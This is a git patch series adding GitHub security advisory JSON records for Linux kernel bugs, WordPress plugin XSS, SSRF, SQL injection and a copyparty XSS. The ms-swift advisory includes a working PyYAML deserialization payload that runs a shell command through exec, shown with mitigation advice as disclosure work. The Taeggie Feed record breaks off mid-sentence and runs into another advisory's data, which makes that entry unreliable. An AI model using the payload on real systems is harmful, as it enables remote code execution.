file diff --git a/advisories/unreviewed/2025/07/GHSA-q2mh-4m4x-85qc/GHSA-q2mh-4m4x-85qc.json b/advisories/unreviewed/2025/07/GHSA-q2mh-4m4x-85qc/GHSA-q2mh-4m4x-85qc.json new file mode 100644 index 0000000000000..b4fb0f0197367 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q2mh-4m4x-85qc/GHSA-q2mh-4m4x-85qc.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2mh-4m4x-85qc", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38385" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: lan78xx: fix WARN in __netif_napi_del_locked on disconnect\n\nRemove redundant netif_napi_del() call from disconnect path.\n\nA WARN may be triggered in __netif_napi_del_locked() during USB device\ndisconnect:\n\n WARNING: CPU: 0 PID: 11 at net/core/dev.c:7417 __netif_napi_del_locked+0x2b4/0x350\n\nThis happens because netif_napi_del() is called in the disconnect path while\nNAPI is still enabled. However, it is not necessary to call netif_napi_del()\nexplicitly, since unregister_netdev() will handle NAPI teardown automatically\nand safely. Removing the redundant call avoids triggering the warning.\n\nFull trace:\n lan78xx 1-1:1.0 enu1: Failed to read register index 0x000000c4. ret = -ENODEV\n lan78xx 1-1:1.0 enu1: Failed to set MAC down with error -ENODEV\n lan78xx 1-1:1.0 enu1: Link is Down\n lan78xx 1-1:1.0 enu1: Failed to read register index 0x00000120. ret = -ENODEV\n ------------[ cut here ]------------\n WARNING: CPU: 0 PID: 11 at net/core/dev.c:7417 __netif_napi_del_locked+0x2b4/0x350\n Modules linked in: flexcan can_dev fuse\n CPU: 0 UID: 0 PID: 11 Comm: kworker/0:1 Not tainted 6.16.0-rc2-00624-ge926949dab03 #9 PREEMPT\n Hardware name: SKOV IMX8MP CPU revC - bd500 (DT)\n Workqueue: usb_hub_wq hub_event\n pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : __netif_napi_del_locked+0x2b4/0x350\n lr : __netif_napi_del_locked+0x7c/0x350\n sp : ffffffc085b673c0\n x29: ffffffc085b673c0 x28: ffffff800b7f2000 x27: ffffff800b7f20d8\n x26: ffffff80110bcf58 x25: ffffff80110bd978 x24: 1ffffff0022179eb\n x23: ffffff80110bc000 x22: ffffff800b7f5000 x21: ffffff80110bc000\n x20: ffffff80110bcf38 x19: ffffff80110bcf28 x18: dfffffc000000000\n x17: ffffffc081578940 x16: ffffffc08284cee0 x15: 0000000000000028\n x14: 0000000000000006 x13: 0000000000040000 x12: ffffffb0022179e8\n x11: 1ffffff0022179e7 x10: ffffffb0022179e7 x9 : dfffffc000000000\n x8 : 0000004ffdde8619 x7 : ffffff80110bcf3f x6 : 0000000000000001\n x5 : ffffff80110bcf38 x4 : ffffff80110bcf38 x3 : 0000000000000000\n x2 : 0000000000000000 x1 : 1ffffff0022179e7 x0 : 0000000000000000\n Call trace:\n __netif_napi_del_locked+0x2b4/0x350 (P)\n lan78xx_disconnect+0xf4/0x360\n usb_unbind_interface+0x158/0x718\n device_remove+0x100/0x150\n device_release_driver_internal+0x308/0x478\n device_release_driver+0x1c/0x30\n bus_remove_device+0x1a8/0x368\n device_del+0x2e0/0x7b0\n usb_disable_device+0x244/0x540\n usb_disconnect+0x220/0x758\n hub_event+0x105c/0x35e0\n process_one_work+0x760/0x17b0\n worker_thread+0x768/0xce8\n kthread+0x3bc/0x690\n ret_from_fork+0x10/0x20\n irq event stamp: 211604\n hardirqs last enabled at (211603): [] _raw_spin_unlock_irqrestore+0x84/0x98\n hardirqs last disabled at (211604): [] el1_dbg+0x24/0x80\n softirqs last enabled at (211296): [] handle_softirqs+0x820/0xbc8\n softirqs last disabled at (210993): [] __do_softirq+0x18/0x20\n ---[ end trace 0000000000000000 ]---\n lan78xx 1-1:1.0 enu1: failed to kill vid 0081/0", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38385" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/17a37b9a5dd945d86110838fb471e7139ba993a2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/510a6095d754df9d727f644ec5076b7929d6c9ea" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6c7ffc9af7186ed79403a3ffee9a1e5199fc7450" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7135056a49035597198280820c61b8c5dbe4a1d0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/968a419c95131e420f12bbdba19e96e2f6b071c4" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q39g-p2v5-mq6j/GHSA-q39g-p2v5-mq6j.json b/advisories/unreviewed/2025/07/GHSA-q39g-p2v5-mq6j/GHSA-q39g-p2v5-mq6j.json new file mode 100644 index 0000000000000..567e9105df69c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q39g-p2v5-mq6j/GHSA-q39g-p2v5-mq6j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q39g-p2v5-mq6j", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-6387" + ], + "details": "The WP Get The Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6387" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wp-get-the-table/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8bd18b7a-6555-4838-821d-fcbe0be34ac4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q6ch-8cp2-xfhp/GHSA-q6ch-8cp2-xfhp.json b/advisories/unreviewed/2025/07/GHSA-q6ch-8cp2-xfhp/GHSA-q6ch-8cp2-xfhp.json new file mode 100644 index 0000000000000..4289696b4a3c6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q6ch-8cp2-xfhp/GHSA-q6ch-8cp2-xfhp.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6ch-8cp2-xfhp", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38369" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: Check availability of workqueue allocated by idxd wq driver before using\n\nRunning IDXD workloads in a container with the /dev directory mounted can\ntrigger a call trace or even a kernel panic when the parent process of the\ncontainer is terminated.\n\nThis issue occurs because, under certain configurations, Docker does not\nproperly propagate the mount replica back to the original mount point.\n\nIn this case, when the user driver detaches, the WQ is destroyed but it\nstill calls destroy_workqueue() attempting to completes all pending work.\nIt's necessary to check wq->wq and skip the drain if it no longer exists.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38369" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/17502e7d7b7113346296f6758324798d536c31fd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/98fd66c8ba77e3a7137575f610271014bc0e701f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aee7a7439f8c0884da87694a401930204a57128f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e0051a3daa8b2cb318b03b2f9317c3e40855847a" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q8xm-9c69-h9m6/GHSA-q8xm-9c69-h9m6.json b/advisories/unreviewed/2025/07/GHSA-q8xm-9c69-h9m6/GHSA-q8xm-9c69-h9m6.json new file mode 100644 index 0000000000000..9f421f1785e47 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q8xm-9c69-h9m6/GHSA-q8xm-9c69-h9m6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8xm-9c69-h9m6", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-6588" + ], + "details": "The FunnelCockpit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘error’ parameter in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6588" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/funnelcockpit/trunk/admin/class-funnelcockpit-admin.php#L433" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/df2e744f-e1d6-4380-8e24-e98e9df4dd2f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q9hc-qj7m-hpc9/GHSA-q9hc-qj7m-hpc9.json b/advisories/unreviewed/2025/07/GHSA-q9hc-qj7m-hpc9/GHSA-q9hc-qj7m-hpc9.json new file mode 100644 index 0000000000000..e0a1ea3afde7a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q9hc-qj7m-hpc9/GHSA-q9hc-qj7m-hpc9.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q9hc-qj7m-hpc9", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38376" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: chipidea: udc: disconnect/reconnect from host when do suspend/resume\n\nShawn and John reported a hang issue during system suspend as below:\n\n - USB gadget is enabled as Ethernet\n - There is data transfer over USB Ethernet (scp a big file between host\n and device)\n - Device is going in/out suspend (echo mem > /sys/power/state)\n\nThe root cause is the USB device controller is suspended but the USB bus\nis still active which caused the USB host continues to transfer data with\ndevice and the device continues to queue USB requests (in this case, a\ndelayed TCP ACK packet trigger the issue) after controller is suspended,\nhowever the USB controller clock is already gated off. Then if udc driver\naccess registers after that point, the system will hang.\n\nThe correct way to avoid such issue is to disconnect device from host when\nthe USB bus is not at suspend state. Then the host will receive disconnect\nevent and stop data transfer in time. To continue make USB gadget device\nwork after system resume, this will reconnect device automatically.\n\nTo make usb wakeup work if USB bus is already at suspend state, this will\nkeep connection for it only when USB device controller has enabled wakeup\ncapability.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38376" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/31a6afbe86e8e9deba9ab53876ec49eafc7fd901" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5fd585fedb79bac2af9976b0fa3ffa354f0cc0bb" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/937f49be49d6ee696eb5457c21ff89c135c9b5ae" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c68a27bbebbdb4e0ccd45d4f0df7111a09ddac24" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qfpm-f474-gprj/GHSA-qfpm-f474-gprj.json b/advisories/unreviewed/2025/07/GHSA-qfpm-f474-gprj/GHSA-qfpm-f474-gprj.json new file mode 100644 index 0000000000000..f9d8828077180 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qfpm-f474-gprj/GHSA-qfpm-f474-gprj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfpm-f474-gprj", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-6385" + ], + "details": "The WP Applink plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘title’ parameter in all versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6385" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wp-applink/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/75e41e78-ce8c-4248-9eca-b36391fbbbde?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qq4v-pr8w-v8hg/GHSA-qq4v-pr8w-v8hg.json b/advisories/unreviewed/2025/07/GHSA-qq4v-pr8w-v8hg/GHSA-qq4v-pr8w-v8hg.json new file mode 100644 index 0000000000000..ebb81318c8d2e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qq4v-pr8w-v8hg/GHSA-qq4v-pr8w-v8hg.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq4v-pr8w-v8hg", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38407" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: cpu_ops_sbi: Use static array for boot_data\n\nSince commit 6b9f29b81b15 (\"riscv: Enable pcpu page first chunk\nallocator\"), if NUMA is enabled, the page percpu allocator may be used\non very sparse configurations, or when requested on boot with\npercpu_alloc=page.\n\nIn that case, percpu data gets put in the vmalloc area. However,\nsbi_hsm_hart_start() needs the physical address of a sbi_hart_boot_data,\nand simply assumes that __pa() would work. This causes the just started\nhart to immediately access an invalid address and hang.\n\nFortunately, struct sbi_hart_boot_data is not too large, so we can\nsimply allocate an array for boot_data statically, putting it in the\nkernel image.\n\nThis fixes NUMA=y SMP boot on Sophgo SG2042.\n\nTo reproduce on QEMU: Set CONFIG_NUMA=y and CONFIG_DEBUG_VIRTUAL=y, then\nrun with:\n\n qemu-system-riscv64 -M virt -smp 2 -nographic \\\n -kernel arch/riscv/boot/Image \\\n -append \"percpu_alloc=page\"\n\nKernel output:\n\n[ 0.000000] Booting Linux on hartid 0\n[ 0.000000] Linux version 6.16.0-rc1 (dram@sakuya) (riscv64-unknown-linux-gnu-gcc (GCC) 14.2.1 20250322, GNU ld (GNU Binutils) 2.44) #11 SMP Tue Jun 24 14:56:22 CST 2025\n...\n[ 0.000000] percpu: 28 4K pages/cpu s85784 r8192 d20712\n...\n[ 0.083192] smp: Bringing up secondary CPUs ...\n[ 0.086722] ------------[ cut here ]------------\n[ 0.086849] virt_to_phys used for non-linear address: (____ptrval____) (0xff2000000001d080)\n[ 0.088001] WARNING: CPU: 0 PID: 1 at arch/riscv/mm/physaddr.c:14 __virt_to_phys+0xae/0xe8\n[ 0.088376] Modules linked in:\n[ 0.088656] CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.16.0-rc1 #11 NONE\n[ 0.088833] Hardware name: riscv-virtio,qemu (DT)\n[ 0.088948] epc : __virt_to_phys+0xae/0xe8\n[ 0.089001] ra : __virt_to_phys+0xae/0xe8\n[ 0.089037] epc : ffffffff80021eaa ra : ffffffff80021eaa sp : ff2000000004bbc0\n[ 0.089057] gp : ffffffff817f49c0 tp : ff60000001d60000 t0 : 5f6f745f74726976\n[ 0.089076] t1 : 0000000000000076 t2 : 705f6f745f747269 s0 : ff2000000004bbe0\n[ 0.089095] s1 : ff2000000001d080 a0 : 0000000000000000 a1 : 0000000000000000\n[ 0.089113] a2 : 0000000000000000 a3 : 0000000000000000 a4 : 0000000000000000\n[ 0.089131] a5 : 0000000000000000 a6 : 0000000000000000 a7 : 0000000000000000\n[ 0.089155] s2 : ffffffff8130dc00 s3 : 0000000000000001 s4 : 0000000000000001\n[ 0.089174] s5 : ffffffff8185eff8 s6 : ff2000007f1eb000 s7 : ffffffff8002a2ec\n[ 0.089193] s8 : 0000000000000001 s9 : 0000000000000001 s10: 0000000000000000\n[ 0.089211] s11: 0000000000000000 t3 : ffffffff8180a9f7 t4 : ffffffff8180a9f7\n[ 0.089960] t5 : ffffffff8180a9f8 t6 : ff2000000004b9d8\n[ 0.089984] status: 0000000200000120 badaddr: ffffffff80021eaa cause: 0000000000000003\n[ 0.090101] [] __virt_to_phys+0xae/0xe8\n[ 0.090228] [] sbi_cpu_start+0x6e/0xe8\n[ 0.090247] [] __cpu_up+0x1e/0x8c\n[ 0.090260] [] bringup_cpu+0x42/0x258\n[ 0.090277] [] cpuhp_invoke_callback+0xe0/0x40c\n[ 0.090292] [] __cpuhp_invoke_callback_range+0x68/0xfc\n[ 0.090320] [] _cpu_up+0x11a/0x244\n[ 0.090334] [] cpu_up+0x52/0x90\n[ 0.090384] [] bringup_nonboot_cpus+0x78/0x118\n[ 0.090411] [] smp_init+0x34/0xb8\n[ 0.090425] [] kernel_init_freeable+0x148/0x2e4\n[ 0.090442] [] kernel_init+0x1e/0x14c\n[ 0.090455] [] ret_from_fork_kernel+0xe/0xf0\n[ 0.090471] [] ret_from_fork_kernel_asm+0x16/0x18\n[ 0.090560] ---[ end trace 0000000000000000 ]---\n[ 1.179875] CPU1: failed to come online\n[ 1.190324] smp: Brought up 1 node, 1 CPU", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38407" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/02c725cd55eb5052b88eeaa3f60a391ef4dcaec5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2b29be967ae456fc09c320d91d52278cf721be1e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f5fe094f35a37adea40b2fd52c99bb1333be9b07" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r55g-vw99-ww9p/GHSA-r55g-vw99-ww9p.json b/advisories/unreviewed/2025/07/GHSA-r55g-vw99-ww9p/GHSA-r55g-vw99-ww9p.json new file mode 100644 index 0000000000000..a14d6702fd0f6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-r55g-vw99-ww9p/GHSA-r55g-vw99-ww9p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r55g-vw99-ww9p", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-45939" + ], + "details": "Apwide Golive 10.2.0 Jira plugin allows Server-Side Request Forgery (SSRF) via the test webhook function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45939" + }, + { + "type": "WEB", + "url": "https://golive.apwide.com/doc/latest/server-data-center/2025-06-06" + }, + { + "type": "WEB", + "url": "http://golive.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r9h3-hffm-gf8q/GHSA-r9h3-hffm-gf8q.json b/advisories/unreviewed/2025/07/GHSA-r9h3-hffm-gf8q/GHSA-r9h3-hffm-gf8q.json new file mode 100644 index 0000000000000..49c1003c92edc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-r9h3-hffm-gf8q/GHSA-r9h3-hffm-gf8q.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9h3-hffm-gf8q", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-44608" + ], + "details": "CloudClassroom-PHP Project v1.0 was discovered to contain a SQL injection vulnerability via the viewid parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-44608" + }, + { + "type": "WEB", + "url": "https://github.com/mr-xmen786/CVE-2025-44608" + }, + { + "type": "WEB", + "url": "http://cloudclassroom-php.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rv4p-hv2v-9w74/GHSA-rv4p-hv2v-9w74.json b/advisories/unreviewed/2025/07/GHSA-rv4p-hv2v-9w74/GHSA-rv4p-hv2v-9w74.json new file mode 100644 index 0000000000000..c344f37069212 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rv4p-hv2v-9w74/GHSA-rv4p-hv2v-9w74.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv4p-hv2v-9w74", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-6382" + ], + "details": "The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's taeggie-feed shortcode in all versions up to, and including, 0.1.10. The plugin’s render() method takes the user-supplied name attribute and injects it directly into a \n```", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "copyparty" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.18.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.18.6" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/9001/copyparty/security/advisories/GHSA-8mx2-rjh8-q3jq" + }, + { + "type": "WEB", + "url": "https://github.com/9001/copyparty/commit/a8705e611d05eeb22be5d3d7d9ab5c020fe54c62" + }, + { + "type": "PACKAGE", + "url": "https://github.com/9001/copyparty" + }, + { + "type": "WEB", + "url": "https://github.com/9001/copyparty/releases/tag/v1.18.7" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T13:48:36Z", + "nvd_published_at": null + } +} \ No newline at end of file From 203817d5416dbd58f78aa9ba7bdb26d19c7ac820 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 14:04:11 +0000 Subject: [PATCH 274/323] Publish GHSA-fm6c-f59h-7mmg --- .../GHSA-fm6c-f59h-7mmg.json | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json diff --git a/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json b/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json new file mode 100644 index 0000000000000..af7b0d4206948 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fm6c-f59h-7mmg", + "modified": "2025-07-31T14:02:34Z", + "published": "2025-07-31T14:02:34Z", + "aliases": [ + "CVE-2025-50460" + ], + "summary": "MS SWIFT Remote Code Execution via unsafe PyYAML deserialization", + "details": "## Description\n\nA Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`.\n\nIf an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution.\n\n## Affected Repository\n\n- **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift)\n- **Affect versions:** latest\n- **File:** `tests/run.py`\n- **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420\n- **Dependency:** PyYAML <= 5.3.1\n\n## Vulnerable Code\n\n```python\nif args.run_config is not None and Path(args.run_config).exists():\n with open(args.run_config, encoding='utf-8') as f:\n run_config = yaml.load(f, Loader=yaml.FullLoader)\n```\n\n## Proof of Concept (PoC)\n\n### Step 1: Create malicious YAML file (`exploit.yaml`)\n\n```yaml\n!!python/object/new:type\nargs: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\nlistitems: \"__import__('os').system('mkdir HACKED')\"\n```\n\n### Step 2: Execute with vulnerable PyYAML (<= 5.3.1)\n\n```python\nimport yaml\n\nwith open(\"exploit.yaml\", \"r\") as f:\n cfg = yaml.load(f, Loader=yaml.FullLoader)\n```\n\nThis results in execution of `os.system`, proving code execution.\n\n## Mitigation\n\n* Replace `yaml.load()` with `yaml.safe_load()`\n* Upgrade PyYAML to version 5.4 or later\n\n### Example Fix:\n\n```python\n# Before\nyaml.load(f, Loader=yaml.FullLoader)\n\n# After\nyaml.safe_load(f)\n```\n\n\n## Author\n\n* Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)\n* Contact: *\\[[anchor.rongyu020221@gmail.com](mailto:anchor.rongyu020221@gmail.com)]*", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ms-swift" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.6.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/security/advisories/GHSA-fm6c-f59h-7mmg" + }, + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/pull/5174" + }, + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/commit/b3418ed9b050dc079553c275c5ed14cfb2b66cf7" + }, + { + "type": "WEB", + "url": "https://github.com/Anchor0221/CVE-2025-50460" + }, + { + "type": "PACKAGE", + "url": "https://github.com/modelscope/ms-swift" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T14:02:34Z", + "nvd_published_at": null + } +} \ No newline at end of file From 6c2a17aed8f6bb0dbf92b61ae954c59e72402cd9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 14:06:32 +0000 Subject: [PATCH 275/323] Publish Advisories GHSA-7c78-rm87-5673 GHSA-r54c-2xmf-2cf3 --- .../GHSA-7c78-rm87-5673.json | 59 +++++++++++++++++++ .../GHSA-r54c-2xmf-2cf3.json | 59 +++++++++++++++++++ 2 files changed, 118 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-7c78-rm87-5673/GHSA-7c78-rm87-5673.json create mode 100644 advisories/github-reviewed/2025/07/GHSA-r54c-2xmf-2cf3/GHSA-r54c-2xmf-2cf3.json diff --git a/advisories/github-reviewed/2025/07/GHSA-7c78-rm87-5673/GHSA-7c78-rm87-5673.json b/advisories/github-reviewed/2025/07/GHSA-7c78-rm87-5673/GHSA-7c78-rm87-5673.json new file mode 100644 index 0000000000000..68bfdd0df0a57 --- /dev/null +++ 